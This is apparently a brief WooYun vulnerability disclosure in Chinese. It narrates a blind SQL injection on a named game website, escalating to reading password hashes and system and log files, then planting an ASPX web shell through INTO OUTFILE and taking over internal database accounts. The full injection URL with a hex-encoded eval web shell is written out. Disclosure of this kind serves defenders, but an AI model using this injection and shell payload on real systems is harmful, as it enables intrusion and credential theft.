WooYun.org

从一个盲注开始
http://dj.17m3.com/game.aspx?sercon=*

back-end DBMS: MySQL 5.0.11

current user:    'root\\@122.224.197.%'

竟然是root
mysql.user读出来帐号密码，成功解密了2个
上神器cloudeye
一个劲的读/etc/sysconfig/network-scripts/ifcfg-eth0,/etc/passwd
然后一个劲的报错
手贱HEX读了下c:/windows/system32/cmd.exe 发现竟然有返回，竟然是windows、win主机cloudeye不是应该能返回apache日志ip的么但是这里确实没有。
继续
从C:\WINDOWS\system32\LogFiles\HTTPERR\httperr1.log中读出来ip
发现数据库服务器上还有iis
读C:\WINDOWS\system32\inetsrv\MetaBase.xml
得到一个主机头跟目录
写shell

http://dj.17m3.com/game.aspx?sercon=%' LIMIT 0,1 INTO OUTFILE 'F:/TenMinBreak/wwwroot/edm.mail.m3guocdn.com/bbb.aspx' LINES TERMINATED BY 0x68693C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B2261626364225D2C22756E7361666522293B253E--  AND '%'='

上菜刀。
各种内网sa，root。
这台数据库服务器太丰富了，没敢再进一步深入了。